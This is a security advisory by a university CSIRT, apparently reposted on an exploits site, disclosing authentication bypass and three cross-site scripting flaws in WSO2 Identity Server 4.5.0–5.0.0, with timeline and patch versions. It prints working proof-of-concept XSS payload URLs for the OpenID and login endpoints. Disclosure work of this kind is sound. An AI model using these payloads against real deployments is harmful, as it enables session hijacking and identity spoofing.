Home / exploitsPDF  

WSO2 Identity Server 4.5.0 / 4.6.0 / 5.0.0 Bypass / Cross Site Scripting

Posted on 26 March 2015

Hi, WSO2 Identity Server (http://wso2.com/products/identity-server/) version 4.5.0/4.6.0/5.0.0 is prone to multiple vulnerabilities, including authentication bypass. Timeline: 09.10.2014 - Vendor notified 22.11.2014 - Vendor confirmed 04.12.2014 - Patches released 25.03.2015 - Bugtraq disclosure Vulnerable versions: IS 4.5.0 IS 4.6.0 IS 5.0.0 Fixed versions: IS 4.5.0 + WSO2-CARBON-PATCH-4.2.0-0932 IS 4.6.0 + WSO2-CARBON-PATCH-4.2.0-0933 IS 5.0.0 + WSO2-CARBON-PATCH-4.2.0-0930 IS 5.0.0 + Service Pack 1 Vulnerabilities details: 1) Identity spoofing/authentication bypass. Attacker need to log in to WSO2 IS to obtain valid HTTP session. Given this session he/she can request OpenID assertion from WSO2 IS to _any_ identity (openid.identity). Thus any authenticated user is able to spoof any identity he/she requests, in order to login to RP as user of his/her will. 2) XSS A - HTML injection https://<wso2is_address>/openid/%3cIMG%20SRC%3d%22a%22%20onerror=alert(%22XSS%22)%3e 3) XSS B - HTML injection https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&openid.claimed_id=https://example.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e%27%2f%3e%3c%73%63%72%69%70%74%3eeval("ale"%2b"rt(1)")%3c%2f%73%63%72%69%70%74%3e&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL 4) XSS C - JavaScript injection https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&openid.claimed_id=https://example.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e-aaa"%0a};alert(1);%0aif(0){"&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL regards -- Bartlomiej Balcerek WCSS CSIRT Wroclaw Centre for Networking and Supercomputing Wroclaw University of Technology, Poland phone: +48 (71) 320-20-79 mail: bartol@pwr.edu.pl

 

TOP